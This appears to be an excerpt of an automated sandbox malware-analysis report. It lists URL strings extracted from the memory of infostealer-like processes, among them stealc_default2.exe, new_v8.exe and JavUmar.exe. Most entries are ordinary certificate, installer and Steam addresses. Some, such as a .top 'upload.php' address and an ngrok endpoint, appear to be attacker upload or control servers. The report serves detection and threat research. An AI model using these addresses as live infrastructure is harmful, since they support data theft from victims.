Source: splwow64.exe, 0000000B.00000000.2818845757.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, splwow64.exe, 0000000B.00000002.2888142882.0000000000408000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3045023186.0000000003C41000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3660238701.00000000054F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: new_v8.exe, 0000001E.00000003.3045023186.0000000003C41000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3660238701.00000000054F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: axplong.exe, 00000006.00000002.4852244876.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: splwow64.exe, 0000000B.00000003.2833312201.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000002.4852242929.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000003.2889206601.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: splwow64.exe, 0000000B.00000003.2833312201.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000002.4852242929.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000003.2889206601.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: splwow64.exe, 0000000B.00000002.2888179040.000000000041F000.00000004.00000001.01000000.0000000D.sdmp, splwow64.exe, 0000000B.00000003.2833312201.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000002.4852242929.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000003.2889206601.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: splwow64.exe, 0000000B.00000003.2833312201.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000002.4852242929.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000003.2889206601.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: splwow64.exe, 0000000B.00000003.2833312201.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000002.4852242929.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000003.2889206601.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: JavUmar.exe, 0000001F.00000003.3795884336.0000000001767000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevjoi17vt.top/v1/upload.php
Source: JavUmar.exe, 0000001F.00000003.3795884336.0000000001767000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevjoi17vt.top/v1/upload.phpynamic
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: splwow64.exe, 0000000B.00000003.2833312201.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000003.2889206601.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000000.2879437391.0000000000799000.00000002.00000001.01000000.0000000E.sdmp, EcoCraft.scr, 0000001D.00000000.2909953578.0000000000179000.00000002.00000001.01000000.00000010.sdmp, EcoCraft.scr, 00000023.00000002.3037130048.0000000000179000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: stail.exe, 00000025.00000003.3206349513.0000000002300000.00000004.00001000.00020000.00000000.sdmp, stail.exe, 00000025.00000002.4804223341.0000000002088000.00000004.00001000.00020000.00000000.sdmp, stail.tmp, 00000026.00000003.3218349961.0000000003120000.00000004.00001000.00020000.00000000.sdmp, stail.tmp, 00000026.00000002.4794965936.000000000056F000.00000004.00000020.00020000.00000000.sdmp, stail.tmp, 00000026.00000003.3218457618.0000000002210000.00000004.00001000.00020000.00000000.sdmp, stail.tmp, 00000026.00000002.4795778246.0000000002208000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.gnu.org/licenses/
Source: stail.exe, 00000025.00000003.3210182635.0000000002094000.00000004.00001000.00020000.00000000.sdmp, stail.exe, 00000025.00000003.3208587232.0000000002300000.00000004.00001000.00020000.00000000.sdmp, stail.tmp, 00000026.00000002.4792518335.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: stail.exe, 00000025.00000000.3204671035.0000000000401000.00000020.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: stail.exe, 00000025.00000000.3204671035.0000000000401000.00000020.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: stealc_default2.exe, stealc_default2.exe, 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: stail.exe, 00000025.00000003.3210182635.0000000002094000.00000004.00001000.00020000.00000000.sdmp, stail.exe, 00000025.00000003.3208587232.0000000002300000.00000004.00001000.00020000.00000000.sdmp, stail.tmp, 00000026.00000002.4792518335.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: stail.exe, 00000025.00000003.3210182635.0000000002094000.00000004.00001000.00020000.00000000.sdmp, stail.exe, 00000025.00000003.3208587232.0000000002300000.00000004.00001000.00020000.00000000.sdmp, stail.tmp, 00000026.00000002.4792518335.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.remobjects.com/psU
Source: stealc_default2.exe, 00000007.00000002.3148017233.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3129729389.000000001AFD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: new_v8.exe, 0000001E.00000003.3045023186.0000000003C41000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3660238701.00000000054F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: new_v8.exe, 0000001E.00000003.3045023186.0000000003C41000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3660238701.00000000054F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: stealc_default2.exe, 00000007.00000003.2833417786.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3009118498.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3650241712.0000000003665000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3414104883.00000000054FC000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3435080893.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 0000002C.00000003.3525441016.0000000003BCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: JavUmar.exe, 0000001F.00000000.2978282515.0000000000583000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: JavUmar.exe, 0000001F.00000000.2978282515.0000000000583000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 3288f0a855.exe, 00000028.00000003.4145121508.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.adma
Source: stealc_default2.exe, 00000007.00000002.3140672714.0000000027170000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3047409910.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3758849726.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3783337411.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: new_v8.exe, 0000001E.00000003.3060297039.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3076312895.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3074856465.0000000000CD8000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3076783994.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3074732448.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3060630671.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743
Source: stealc_default2.exe, 00000007.00000002.3140672714.0000000027170000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3758849726.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3783337411.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.4145121508.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: stealc_default2.exe, 00000007.00000003.2833417786.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3009118498.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3650241712.0000000003665000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3414104883.00000000054FC000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3435080893.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 0000002C.00000003.3525441016.0000000003BCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: stealc_default2.exe, 00000007.00000003.2833417786.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3009118498.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3650241712.0000000003665000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3414104883.00000000054FC000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3435080893.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 0000002C.00000003.3525441016.0000000003BCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: stealc_default2.exe, 00000007.00000003.2833417786.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3009118498.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3650241712.0000000003665000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3414104883.00000000054FC000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3435080893.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 0000002C.00000003.3525441016.0000000003BCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.clou
Source: new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare
Source: new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic
Source: new_v8.exe, 0000001E.00000003.2974128811.0000000000C32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic"HELP_BASE_URL":"https:
Source: new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/pu
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C32000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C32000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975549924.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C32000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C32000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=mf3T
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C32000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&l=englis
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&l=
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&l=engli
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
